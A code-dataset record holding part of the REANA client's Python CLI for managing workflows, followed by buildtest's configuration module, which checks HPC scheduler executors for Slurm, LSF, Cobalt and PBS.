get_workflow_status,
start_workflow,
)
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
parsed_parameters = {"input_parameters": parameters, "operational_options": options}
if workflow:
if parameters or options:
try:
response = get_workflow_parameters(workflow, access_token)
workflow_type = response["type"]
original_parameters = response["parameters"]
validate_operational_options(
workflow_type, parsed_parameters["operational_options"]
)
parsed_parameters["input_parameters"] = validate_input_parameters(
parsed_parameters["input_parameters"], original_parameters
)
except REANAValidationError as e:
click.secho(e.message, err=True, fg="red")
sys.exit(1)
except Exception as e:
click.secho(
"Could not apply given input parameters: "
"{0} \n{1}".format(parameters, str(e)),
err=True,
)
try:
logging.info("Connecting to {0}".format(get_api_url()))
response = start_workflow(workflow, access_token, parsed_parameters)
current_status = get_workflow_status(workflow, access_token).get("status")
click.secho(
get_workflow_status_change_msg(workflow, current_status), fg="green"
)
if follow:
while "running" in current_status:
time.sleep(TIMECHECK)
current_status = get_workflow_status(workflow, access_token).get(
"status"
)
click.secho(
get_workflow_status_change_msg(workflow, current_status),
fg="green",
)
if "finished" in current_status:
if follow:
click.secho(
"[INFO] Listing workflow output " "files...", bold=True
)
ctx.invoke(
get_files,
workflow=workflow,
access_token=access_token,
output_format="url",
)
sys.exit(0)
elif "failed" in current_status or "stopped" in current_status:
sys.exit(1)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot start workflow {}: \n{}".format(workflow, str(e)), fg="red"
),
err=True,
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@workflow_execution_group.command("restart")
@add_workflow_option
@add_access_token_options
@check_connection
@click.option(
"-p",
"--parameter",
"parameters",
multiple=True,
callback=key_value_to_dict,
help="Additional input parameters to override "
"original ones from reana.yaml. "
"E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
"-o",
"--option",
"options",
multiple=True,
callback=key_value_to_dict,
help="Additional operational options for the workflow execution. "
"E.g. CACHE=off. (workflow engine - serial) "
"E.g. --debug (workflow engine - cwl)",
)
@click.option(
"-f",
"--file",
type=click.Path(exists=True, resolve_path=True),
help="REANA specification file describing the workflow to "
"execute. [default=reana.yaml]",
)
@click.pass_context
def workflow_restart(
ctx, workflow, access_token, parameters, options, file
): # noqa: D301
"""Restart previously run workflow.
The `restart` command allows to restart a previous workflow on the same
workspace.
Note that workflow restarting can be used in a combination with operational
options ``FROM`` and ``TARGET``. You can also pass a modified workflow
specification with ``-f`` or `--file`` flag.
You can furthermore use modified input prameters using `-p` or
`--parameters` flag and by setting additional operational options using
`-o` or `--options`. The input parameters and operational options can be
repetitive.
Examples: \n
\t $ reana-client restart -w myanalysis.42 -p sleeptime=10 -p myparam=4 \n
\t $ reana-client restart -w myanalysis.42 -p myparam=myvalue\n
\t $ reana-client restart -w myanalysis.42 -o TARGET=gendata\n
\t $ reana-client restart -w myanalysis.42 -o FROM=fitdata
"""
from reana_client.utils import get_api_url
from reana_client.api.client import (
get_workflow_parameters,
get_workflow_status,
start_workflow,
)
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
parsed_parameters = {
"input_parameters": parameters,
"operational_options": options,
"restart": True,
}
if file:
parsed_parameters["reana_specification"] = load_reana_spec(
click.format_filename(file)
)
if workflow:
if parameters or options:
try:
if "reana_specification" in parsed_parameters:
workflow_type = parsed_parameters["reana_specification"][
"workflow"
]["type"]
original_parameters = (
parsed_parameters["reana_specification"]
.get("inputs", {})
.get("parameters", {})
)
else:
response = get_workflow_parameters(workflow, access_token)
workflow_type = response["type"]
original_parameters = response["parameters"]
parsed_parameters["operational_options"] = validate_operational_options(
workflow_type, parsed_parameters["operational_options"]
)
parsed_parameters["input_parameters"] = validate_input_parameters(
parsed_parameters["input_parameters"], original_parameters
)
except REANAValidationError as e:
click.secho(e.message, err=True, fg="red")
sys.exit(1)
except Exception as e:
click.secho(
"Could not apply given input parameters: "
"{0} \n{1}".format(parameters, str(e)),
err=True,
)
try:
logging.info("Connecting to {0}".format(get_api_url()))
response = start_workflow(workflow, access_token, parsed_parameters)
workflow = response["workflow_name"] + "." + str(response["run_number"])
current_status = get_workflow_status(workflow, access_token).get("status")
click.secho(
get_workflow_status_change_msg(workflow, current_status), fg="green"
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot start workflow {}: \n{}".format(workflow, str(e)), fg="red"
),
err=True,
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@workflow_execution_group.command("status")
@add_workflow_option
@click.option(
"--format",
"_format",
multiple=True,
help="Format output by displaying only certain columns. "
"E.g. --format name,status.",
)
@click.option(
"--json",
"output_format",
flag_value="json",
default=None,
help="Get output in JSON format.",
)
@add_access_token_options
@check_connection
@click.option("-v", "--verbose", count=True, help="Set status information verbosity.")
@click.pass_context
def workflow_status( # noqa: C901
ctx, workflow, _format, output_format, access_token, verbose
): # noqa: D301
"""Get status of a workflow.
The `status` command allow to retrieve status of a workflow. The status can
be created, queued, running, failed, etc. You can increase verbosity or
filter retrieved information by passing appropriate command-line options.
Examples: \n
\t $ reana-client status -w myanalysis.42 \n
\t $ reana-client status -w myanalysis.42 -v --json
"""
import tablib
from reana_client.api.client import get_workflow_status
def render_progress(finished_jobs, total_jobs):
if total_jobs:
return "{0}/{1}".format(finished_jobs, total_jobs)
else:
return "-/-"
def add_data_from_reponse(row, data, headers):
name, run_number = get_workflow_name_and_run_number(row["name"])
total_jobs = row["progress"].get("total")
if total_jobs:
total_jobs = total_jobs.get("total")
else:
total_jobs = 0
finished_jobs = row["progress"].get("finished")
if finished_jobs:
finished_jobs = finished_jobs.get("total")
else:
finished_jobs = 0
parsed_response = list(
map(str, [name, run_number, row["created"], row["status"]])
)
if row["progress"]["total"].get("total") or 0 > 0:
if "progress" not in headers:
headers += ["progress"]
parsed_response.append(render_progress(finished_jobs, total_jobs))
if row["status"] in ["running", "finished", "failed", "stopped"]:
started_at = row["progress"].get("run_started_at")
finished_at = row["progress"].get("run_finished_at")
if started_at:
after_created_pos = headers.index("created") + 1
headers.insert(after_created_pos, "started")
parsed_response.insert(after_created_pos, started_at)
if finished_at:
after_started_pos = headers.index("started") + 1
headers.insert(after_started_pos, "ended")
parsed_response.insert(after_started_pos, finished_at)
data.append(parsed_response)
return data
def add_verbose_data_from_response(response, verbose_headers, headers, data):
for k in verbose_headers:
if k == "command":
current_command = response["progress"]["current_command"]
if current_command:
if current_command.startswith('bash -c "cd '):
current_command = current_command[
current_command.index(";") + 2 : -2
]
data[-1] += [current_command]
else:
if "current_step_name" in response["progress"] and response[
"progress"
].get("current_step_name"):
current_step_name = response["progress"].get(
"current_step_name"
)
data[-1] += [current_step_name]
else:
headers.remove("command")
else:
data[-1] += [response.get(k)]
return data
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if workflow:
try:
if _format:
parsed_filters = parse_format_parameters(_format)
_format = [item["column_name"] for item in parsed_filters]
response = get_workflow_status(workflow, access_token)
headers = ["name", "run_number", "created", "status"]
verbose_headers = ["id", "user", "command"]
data = []
if not isinstance(response, list):
response = [response]
for workflow in response:
add_data_from_reponse(workflow, data, headers)
if verbose:
headers += verbose_headers
add_verbose_data_from_response(
workflow, verbose_headers, headers, data
)
if output_format:
tablib_data = tablib.Dataset()
tablib_data.headers = headers
for row in data:
tablib_data.append(row)
if _format:
tablib_data = tablib_data.subset(rows=None, cols=list(_format))
click.echo(tablib_data.export(output_format))
else:
click_table_printer(headers, _format, data)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot retrieve the status of a workflow {}: \n{}".format(
workflow, str(e)
),
fg="red",
),
err=True,
)
@workflow_execution_group.command("logs")
@add_workflow_option
@click.option("--json", "json_format", count=True, help="Get output in JSON format.")
@add_access_token_options
@click.option(
"--filter",
"filters",
multiple=True,
help="Filter job logs to include only those steps that match certain filtering criteria. Use --filter name=value pairs. Available filters are compute_backend, docker_img, status and step.",
)
@add_pagination_options
@check_connection
@click.pass_context
def workflow_logs(
ctx,
workflow,
access_token,
json_format,
steps=None,
filters=None,
page=None,
size=None,
): # noqa: D301
"""Get workflow logs.
The `logs` command allows to retrieve logs of running workflow. Note that
only finished steps of the workflow are returned, the logs of the currently
processed step is not returned until it is finished.
Examples: \n
\t $ reana-client logs -w myanalysis.42
\t $ reana-client logs -w myanalysis.42 -s 1st_step
"""
from reana_client.api.client import get_workflow_logs
available_filters = {
"step": "job_name",
"compute_backend": "compute_backend",
"docker_img": "docker_img",
"status": "status",
}
steps = []
chosen_filters = dict()
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if workflow:
if filters:
try:
for f in filters:
key, value = f.split("=")
if key not in available_filters:
click.echo(
click.style(
"Error: filter '{}' is not valid.\nAvailable filters are '{}'.".format(
key, "' '".join(sorted(available_filters.keys())),
),
fg="red",
),
err=True,
)
sys.exit(1)
elif key == "step":
steps.append(value)
else:
# Case insensitive for compute backends
if (
key == "compute_backend"
and value.lower() in REANA_COMPUTE_BACKENDS
):
value = REANA_COMPUTE_BACKENDS[value.lower()]
elif key == "status" and value not in RUN_STATUSES:
click.secho(
"==> ERROR: Input status value {} is not valid. ".format(
value
),
err=True,
fg="red",
),
sys.exit(1)
chosen_filters[key] = value
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Error: please provide complete --filter name=value pairs, for example --filter status=running.\nAvailable filters are '{}'.".format(
"' '".join(sorted(available_filters.keys()))
),
fg="red",
),
err=True,
)
sys.exit(1)
try:
response = get_workflow_logs(
workflow,
access_token,
steps=None if not steps else list(set(steps)),
page=page,
size=size,
)
workflow_logs = json.loads(response["logs"])
if filters:
for key, value in chosen_filters.items():
unwanted_steps = [
k
for k, v in workflow_logs["job_logs"].items()
if v[available_filters[key]] != value
]
for job_id in unwanted_steps:
del workflow_logs["job_logs"][job_id]
if json_format:
click.echo(json.dumps(workflow_logs, indent=2))
sys.exit(0)
else:
from reana_client.cli.utils import output_user_friendly_logs
output_user_friendly_logs(
workflow_logs, None if not steps else list(set(steps))
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot retrieve the logs of a workflow {}: \n{}".format(
workflow, str(e)
),
fg="red",
),
err=True,
)
@workflow_execution_group.command("validate")
@click.option(
"-f",
"--file",
type=click.Path(exists=True, resolve_path=True),
default=get_reana_yaml_file_path,
help="REANA specification file describing the workflow to "
"execute. [default=reana.yaml]",
)
@click.option(
"--environments",
is_flag=True,
default=False,
help="If set, check all runtime environments specified in REANA "
"specification file. [default=False]",
)
@click.option(
"--pull",
is_flag=True,
default=False,
callback=requires_environments,
help="If set, try to pull remote environment image from registry to perform "
"validation locally. Requires ``--environments`` flag. [default=False]",
)
@click.pass_context
def workflow_validate(ctx, file, environments, pull): # noqa: D301
"""Validate workflow specification file.
The `validate` command allows to check syntax and validate the reana.yaml
workflow specification file.
Examples: \n
\t $ reana-client validate -f reana.yaml
"""
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
try:
load_reana_spec(
click.format_filename(file),
skip_validate_environments=not environments,
pull_environment_image=pull,
)
except (ValidationError, REANAValidationError) as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"{0} is not a valid REANA specification:\n{1}".format(
click.format_filename(file), e.message
),
msg_type="error",
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"Something went wrong when trying to validate {}".format(file),
msg_type="error",
)
@workflow_execution_group.command("stop")
@click.option(
"--force",
"force_stop",
is_flag=True,
default=False,
help="Stop a workflow without waiting for jobs to finish.",
)
@add_workflow_option
@add_access_token_options
@check_connection
@click.pass_context
def workflow_stop(ctx, workflow, force_stop, access_token): # noqa: D301
"""Stop a running workflow.
The `stop` command allows to hard-stop the running workflow process. Note
that soft-stopping of the workflow is currently not supported. This command
should be therefore used with care, only if you are absolutely sure that
there is no point in continuing the running the workflow.
Example: \n
\t $ reana-client stop -w myanalysis.42 --force
"""
from reana_client.api.client import get_workflow_status, stop_workflow
if not force_stop:
click.secho(
"Graceful stop not implement yet. If you really want to "
"stop your workflow without waiting for jobs to finish"
" use: --force option",
fg="red",
)
raise click.Abort()
if workflow:
try:
logging.info("Sending a request to stop workflow {}".format(workflow))
stop_workflow(workflow, force_stop, access_token)
click.secho(get_workflow_status_change_msg(workflow, "stopped"), fg="green")
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.secho(
"Cannot stop workflow {}: \n{}".format(workflow, str(e)),
fg="red",
err=True,
)
@workflow_execution_group.command("run")
@click.option(
"-f",
"--file",
type=click.Path(exists=True, resolve_path=True),
default=get_reana_yaml_file_path,
help="REANA specification file describing the workflow to "
"execute. [default=reana.yaml]",
)
@click.option(
"-n",
"--name",
"-w",
"--workflow",
default="",
callback=validate_workflow_name,
help='Optional name of the workflow. [default is "workflow"]',
)
@click.option(
"--skip-validation",
is_flag=True,
help="If set, specifications file is not validated before "
"submitting it's contents to REANA server.",
)
@click.option(
"-p",
"--parameter",
"parameters",
multiple=True,
callback=key_value_to_dict,
help="Additional input parameters to override "
"original ones from reana.yaml. "
"E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
"-o",
"--option",
"options",
multiple=True,
callback=key_value_to_dict,
help="Additional operational options for the workflow execution. "
"E.g. CACHE=off.",
)
@click.option(
"--follow",
"follow",
is_flag=True,
default=False,
help="If set, follows the execution of the workflow until termination.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_run(
ctx, file, name, skip_validation, access_token, parameters, options, follow
): # noqa: D301
"""Shortcut to create, upload, start a new workflow.
The `run` command allows to create a new workflow, upload its input files
and start it in one command.
Examples: \n
\t $ reana-client run -w myanalysis-test-small -p myparam=mysmallvalue \n
\t $ reana-client run -w myanalysis-test-big -p myparam=mybigvalue
"""
# set context parameters for subcommand
ctx.invoked_by_subcommand = True
ctx.workflow_name = ""
click.secho("[INFO] Creating a workflow...", bold=True)
ctx.invoke(
workflow_create,
file=file,
name=name,
skip_validation=skip_validation,
access_token=access_token,
)
click.secho("[INFO] Uploading files...", bold=True)
ctx.invoke(
upload_files,
workflow=ctx.workflow_name,
filenames=None,
access_token=access_token,
)
click.secho("[INFO] Starting workflow...", bold=True)
ctx.invoke(
workflow_start,
workflow=ctx.workflow_name,
access_token=access_token,
parameters=parameters,
options=options,
follow=follow,
)
@workflow_management_group.command("delete")
@click.option(
"--include-all-runs",
"all_runs",
is_flag=True,
help="Delete all runs of a given workflow.",
)
@click.option(
"--include-workspace",
"workspace",
is_flag=True,
help="Delete workspace from REANA.",
)
@add_workflow_option
@add_access_token_options
@check_connection
@click.pass_context
def workflow_delete(ctx, workflow, all_runs, workspace, access_token): # noqa: D301
"""Delete a workflow.
The `delete` command allows to remove workflow runs from the database and
the workspace. By default, the command removes the workflow and all its
cached information and hides the workflow from the workflow list. Note that
workflow workspace will still be accessible until you use
`--include-workspace` flag. Note also that you can remove all past runs of
a workflow by specifying `--include-all-runs` flag.
Example: \n
\t $ reana-client delete -w myanalysis.42 \n
\t $ reana-client delete -w myanalysis.42 --include-all-runs \n
\t $ reana-client delete -w myanalysis.42 --include-workspace
"""
from reana_client.api.client import delete_workflow, get_workflow_status
from reana_client.utils import get_api_url
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if workflow:
try:
logging.info("Connecting to {0}".format(get_api_url()))
delete_workflow(workflow, all_runs, workspace, access_token)
if all_runs:
message = "All workflows named '{}' have been deleted.".format(
workflow.split(".")[0]
)
else:
message = get_workflow_status_change_msg(workflow, "deleted")
click.secho(message, fg="green")
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot delete workflow {} \n{}".format(workflow, str(e)), fg="red"
),
err=True,
)
@workflow_management_group.command("diff")
@click.argument(
"workflow_a",
default=os.environ.get("REANA_WORKON", None),
callback=workflow_uuid_or_name,
)
@click.argument("workflow_b", callback=workflow_uuid_or_name)
@click.option(
"-q",
"--brief",
is_flag=True,
help="If not set, differences in the contents of the files in the two "
"workspaces are shown.",
)
@click.option(
"-u",
"-U",
"--unified",
"context_lines",
type=int,
default=5,
help="Sets number of context lines for workspace diff output.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_diff(
ctx, workflow_a, workflow_b, brief, access_token, context_lines
): # noqa: D301
"""Show diff between two workflows.
The `diff` command allows to compare two workflows, the workflow_a and
workflow_b, which must be provided as arguments. The output will show the
difference in workflow run parameters, the generated files, the logs, etc.
Examples: \n
\t $ reana-client diff myanalysis.42 myotheranalysis.43 \n
\t $ reana-client diff myanalysis.42 myotheranalysis.43 --brief
"""
from reana_client.api.client import diff_workflows
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
def print_color_diff(lines):
for line in lines:
line_color = None
if line[0] == "@":
line_color = "cyan"
elif line[0] == "-":
line_color = "red"
elif line[0] == "+":
line_color = "green"
click.secho(line, fg=line_color)
leading_mark = "==>"
try:
response = diff_workflows(
workflow_a, workflow_b, brief, access_token, str(context_lines)
)
if response.get("reana_specification"):
specification_diff = json.loads(response["reana_specification"])
nonempty_sections = {k: v for k, v in specification_diff.items() if v}
if not nonempty_sections:
click.secho(
"{} No differences in REANA specifications.".format(leading_mark),
bold=True,
fg="yellow",
)
# Rename section workflow -> specification
if "workflow" in nonempty_sections:
nonempty_sections["specification"] = nonempty_sections.pop("workflow")
for section, content in nonempty_sections.items():
click.secho(
"{} Differences in workflow {}".format(leading_mark, section),
bold=True,
fg="yellow",
)
print_color_diff(content)
click.echo("") # Leave 1 line for separation
workspace_diff = json.loads(response.get("workspace_listing"))
if workspace_diff:
workspace_diff = workspace_diff.splitlines()
click.secho(
"{} Differences in workflow workspace".format(leading_mark),
bold=True,
fg="yellow",
)
print_color_diff(workspace_diff)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Something went wrong when trying to get diff:\n{}".format(str(e)),
fg="red",
),
err=True,
)
@click.group(help="Workspace interactive commands")
def interactive_group():
"""Workspace interactive commands."""
pass
@interactive_group.command("open")
@add_workflow_option
@click.argument(
"interactive-session-type",
metavar="interactive-session-type",
default=INTERACTIVE_SESSION_TYPES[0],
type=click.Choice(INTERACTIVE_SESSION_TYPES),
)
@click.option(
"-i",
"--image",
help="Docker image which will be used to spawn the interactive session. "
"Overrides the default image for the selected type.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_open_interactive_session(
ctx, workflow, interactive_session_type, image, access_token
): # noqa: D301
"""Open an interactive session inside the workspace.
The `open` command allows to open interactive session processes on top of
the workflow workspace, such as Jupyter notebooks. This is useful to
quickly inspect and analyse the produced files while the workflow is stlil
running.
Examples:\n
\t $ reana-client open -w myanalysis.42 jupyter
"""
from reana_client.api.client import open_interactive_session
if workflow:
try:
logging.info("Opening an interactive session on {}".format(workflow))
interactive_session_configuration = {
"image": image or None,
}
path = open_interactive_session(
workflow,
access_token,
interactive_session_type,
interactive_session_configuration,
)
click.secho(
format_session_uri(
reana_server_url=ctx.obj.reana_server_url,
path=path,
access_token=access_token,
),
fg="green",
)
click.echo(
"It could take several minutes to start the " "interactive session."
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.secho(
"Interactive session could not be opened: \n{}".format(str(e)),
fg="red",
err=True,
)
else:
click.secho("Cannot find workflow {}".format(workflow), fg="red", err=True)
@interactive_group.command("close")
@add_workflow_option
@add_access_token_options
@check_connection
def workflow_close_interactive_session(workflow, access_token): # noqa: D301
"""Close an interactive session.
The `close` command allows to shut down any interactive sessions that you
may have running. You would typically use this command after you finished
exploring data in the Jupyter notebook and after you have transferred any
code created in your interactive session.
Examples:\n
\t $ reana-client close -w myanalysis.42
"""
from reana_client.api.client import close_interactive_session
if workflow:
try:
logging.info("Closing an interactive session on {}".format(workflow))
close_interactive_session(workflow, access_token)
click.echo(
"Interactive session for workflow {}"
" was successfully closed".format(workflow)
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.secho(
"Interactive session could not be closed: \n{}".format(str(e)),
fg="red",
err=True,
)
else:
click.secho("Cannot find workflow {} ".format(workflow), fg="red", err=True)
| 3,012 | 0 | 108 |
f55121917310571bd99506aae23fcb3e38f91bbb | 12,863 | py | Python | buildtest/config.py | shahzebsiddiqui/buildtest-1 | 6c47424b82ec1e92ce0930f99be4ba10da62515c | [
"MIT"
] | null | null | null | buildtest/config.py | shahzebsiddiqui/buildtest-1 | 6c47424b82ec1e92ce0930f99be4ba10da62515c | [
"MIT"
] | 42 | 2021-04-20T11:11:06.000Z | 2022-03-30T16:54:24.000Z | buildtest/config.py | shahzebsiddiqui/buildtest-1 | 6c47424b82ec1e92ce0930f99be4ba10da62515c | [
"MIT"
] | null | null | null | import json
import logging
import re
from buildtest.defaults import (
DEFAULT_SETTINGS_FILE,
DEFAULT_SETTINGS_SCHEMA,
USER_SETTINGS_FILE,
)
from buildtest.exceptions import ConfigurationError
from buildtest.schemas.defaults import custom_validator
from buildtest.schemas.utils import load_recipe, load_schema
from buildtest.system import LSF, PBS, Cobalt, Slurm, system
from buildtest.utils.command import BuildTestCommand
from buildtest.utils.file import resolve_path
from buildtest.utils.tools import deep_get
logger = logging.getLogger(__name__)
class SiteConfiguration:
"""This class is an interface to buildtest configuration"""
def load(self):
"""Loads configuration file"""
self.config = load_recipe(self._file)
@property
@file.setter
def resolve(self):
"""This method will resolve path to configuration file. The order of precedence is as follows:
1. command line argument - Must be valid path
2. User Configuration: $HOME/.buildtest/config.yml
3. Default Configuration: $BUILDTEST_ROOT/buildtest/settings/config.yml
"""
self._file = (
resolve_path(self._file)
or resolve_path(USER_SETTINGS_FILE)
or DEFAULT_SETTINGS_FILE
)
def name(self):
"""Return name of matched system from configuration file"""
return self._name
def detect_system(self):
"""This method gets current system by setting ``self.target`` by matching ``hostnames`` entry
in each system list with actual system. We retrieve target hostname and determine which system configuration to use.
If no system is found we raise an error.
"""
self.systems = list(self.config["system"].keys())
host_lookup = {}
# get hostname fqdn
cmd = BuildTestCommand("hostname -f")
cmd.execute()
hostname = " ".join(cmd.get_output())
# for every system record we lookup 'hostnames' entry and apply re.match against current hostname. If found we break from loop
for name in self.systems:
host_lookup[name] = self.config["system"][name]["hostnames"]
for host_entry in self.config["system"][name]["hostnames"]:
if re.match(host_entry, hostname):
self.target_config = self.config["system"][name]
self._name = name
break
if not self.target_config:
raise ConfigurationError(
self.config,
self.file,
f"Based on current system hostname: {hostname} we cannot find a matching system {list(self.systems)} based on current hostnames: {host_lookup} ",
)
if self.target_config["executors"].get("local"):
self.localexecutors = list(self.target_config["executors"]["local"].keys())
def validate(self, validate_executors=True):
"""This method validates the site configuration with schema"""
logger.debug(f"Loading default settings schema: {DEFAULT_SETTINGS_SCHEMA}")
config_schema = load_schema(DEFAULT_SETTINGS_SCHEMA)
logger.debug(
f"Validating configuration file with schema: {DEFAULT_SETTINGS_SCHEMA}"
)
custom_validator(recipe=self.config, schema=config_schema)
logger.debug("Validation was successful")
if validate_executors:
self._executor_check()
if (
self.target_config.get("moduletool") != "N/A"
and self.target_config.get("moduletool") != system.system["moduletool"]
):
raise ConfigurationError(
self.config,
self.file,
f"Cannot find modules_tool: {self.target_config['moduletool']} from configuration, please confirm if you have environment-modules or lmod and specify the appropriate tool.",
)
def _validate_lsf_executors(self):
"""This method validates all LSF executors. We check if queue is available
and in ``Open:Active`` state.
"""
lsf_executors = deep_get(self.target_config, "executors", "lsf")
if not lsf_executors:
return
lsf = LSF()
assert hasattr(lsf, "queues")
queue_list = []
valid_queue_state = "Open:Active"
record = lsf.queues["RECORDS"]
# retrieve all queues from json record
for name in record:
queue_list.append(name["QUEUE_NAME"])
# check all executors have defined valid queues and check queue state.
for executor in lsf_executors:
queue = lsf_executors[executor].get("queue")
# if queue field is defined check if its valid queue
if queue:
if queue not in queue_list:
raise ConfigurationError(
self.config,
self.file,
f"{lsf_executors[executor]['queue']} not a valid queue!. Please select one of the following queue: {queue_list}",
)
# check queue record for Status
for name in record:
# skip record until we find matching queue
if name["QUEUE_NAME"] != queue:
continue
queue_state = name["STATUS"]
# if state not Open:Active we raise error
if not queue_state == valid_queue_state:
raise ConfigurationError(
self.config,
self.file,
f"{lsf_executors[executor]['queue']} is in state: {queue_state}. It must be in {valid_queue_state} state in order to accept jobs",
)
self.lsfexecutors.append(executor)
def _validate_slurm_executors(self):
"""This method will validate slurm executors, we check if partition, qos,
and cluster fields are valid values by retrieving details from slurm configuration.
These checks are performed on fields ``partition``, ``qos`` or ``cluster``
if specified in executor section.
"""
slurm_executor = deep_get(self.target_config, "executors", "slurm")
if not slurm_executor:
return
slurm = Slurm()
# make sure slurm attributes slurm.partitions, slurm.qos, slurm.clusters are set
assert hasattr(slurm, "partitions")
assert hasattr(slurm, "qos")
assert hasattr(slurm, "clusters")
for executor in slurm_executor:
# if 'partition' key defined check if its valid partition
if slurm_executor[executor].get("partition"):
if slurm_executor[executor]["partition"] not in slurm.partitions:
raise ConfigurationError(
self.config,
self.file,
f"{slurm_executor[executor]['partition']} not a valid partition!. Please select one of the following partitions: {slurm.partitions}",
)
query = (
f"sinfo -p {slurm_executor[executor]['partition']} -h -O available"
)
cmd = BuildTestCommand(query)
cmd.execute()
part_state = "".join(cmd.get_output())
part_state = part_state.rstrip()
# check if partition is in 'up' state. If not we raise an error.
if part_state != "up":
raise ConfigurationError(
self.config,
self.file,
f"{slurm_executor[executor]['partition']} is in state: {part_state}. It must be in 'up' state in order to accept jobs",
)
# check if 'qos' key is valid qos
if (
slurm_executor[executor].get("qos")
and slurm_executor[executor].get("qos") not in slurm.qos
):
raise ConfigurationError(
self.config,
self.file,
f"{slurm_executor[executor]['qos']} not a valid qos! Please select one of the following qos: {slurm.qos}",
)
# check if 'cluster' key is valid slurm cluster
if (
slurm_executor[executor].get("cluster")
and slurm_executor[executor].get("cluster") not in slurm.clusters
):
raise ConfigurationError(
self.config,
self.file,
f"{slurm_executor[executor]['cluster']} not a valid slurm cluster! Please select one of the following slurm clusters: {slurm.clusters}",
)
self.slurmexecutors.append(executor)
def _validate_cobalt_executors(self):
"""Validate cobalt queue property by running ```qstat -Ql <queue>``. If
its a non-zero exit code then queue doesn't exist otherwise it is a valid
queue.
"""
cobalt_executor = deep_get(self.target_config, "executors", "cobalt")
if not cobalt_executor:
return
cobalt = Cobalt()
assert hasattr(cobalt, "queues")
for executor in cobalt_executor:
queue = cobalt_executor[executor].get("queue")
# if queue property defined in cobalt executor name check if it exists
if queue not in cobalt.queues:
raise ConfigurationError(
self.config,
self.file,
f"Queue: {queue} does not exist! To see available queues you can run 'qstat -Ql'",
)
self.cobaltexecutors.append(executor)
def _validate_pbs_executors(self):
"""Validate pbs queue property by running by checking if queue is found and
queue is 'enabled' and 'started' which are two properties found in pbs queue
configuration that can be retrieved using ``qstat -Q -f -F json``. The output is in
the following format
.. code-block:: console
$ qstat -Q -f -F json
{
"timestamp":1615924938,
"pbs_version":"19.0.0",
"pbs_server":"pbs",
"Queue":{
"workq":{
"queue_type":"Execution",
"total_jobs":0,
"state_count":"Transit:0 Queued:0 Held:0 Waiting:0 Running:0 Exiting:0 Begun:0 ",
"resources_assigned":{
"mem":"0kb",
"ncpus":0,
"nodect":0
},
"hasnodes":"True",
"enabled":"True",
"started":"True"
}
}
}
"""
pbs_executor = deep_get(self.target_config, "executors", "pbs")
if not pbs_executor:
return
pbs = PBS()
assert hasattr(pbs, "queues")
for executor in pbs_executor:
queue = pbs_executor[executor].get("queue")
if queue not in pbs.queues:
raise ConfigurationError(
self.config, self.file, f"{queue} not in {pbs.queues}"
)
if (
pbs.queue_summary["Queue"][queue]["enabled"] != "True"
or pbs.queue_summary["Queue"][queue]["started"] != "True"
):
print("Queue Configuration")
print(json.dumps(pbs.queue_summary, indent=2))
raise ConfigurationError(
self.config,
self.file,
f"{queue} is not enabled or started properly. Please check your queue configuration",
)
self.pbsexecutors.append(executor)
| 38.169139 | 189 | 0.566042 | import json
import logging
import re
from buildtest.defaults import (
DEFAULT_SETTINGS_FILE,
DEFAULT_SETTINGS_SCHEMA,
USER_SETTINGS_FILE,
)
from buildtest.exceptions import ConfigurationError
from buildtest.schemas.defaults import custom_validator
from buildtest.schemas.utils import load_recipe, load_schema
from buildtest.system import LSF, PBS, Cobalt, Slurm, system
from buildtest.utils.command import BuildTestCommand
from buildtest.utils.file import resolve_path
from buildtest.utils.tools import deep_get
logger = logging.getLogger(__name__)
class SiteConfiguration:
"""This class is an interface to buildtest configuration"""
def __init__(self, settings_file=None):
self._file = settings_file
self.config = None
self._name = None
# self.target_config stores value for target system. The configuration may define multiple system,
# but only one system can be active depending on which host buildtest is run
self.target_config = None
self.localexecutors = []
self.slurmexecutors = []
self.lsfexecutors = []
self.cobaltexecutors = []
self.pbsexecutors = []
self.resolve()
self.load()
def load(self):
"""Loads configuration file"""
self.config = load_recipe(self._file)
@property
def file(self):
return self._file
@file.setter
def file(self, path):
self._file = path
def resolve(self):
"""This method will resolve path to configuration file. The order of precedence is as follows:
1. command line argument - Must be valid path
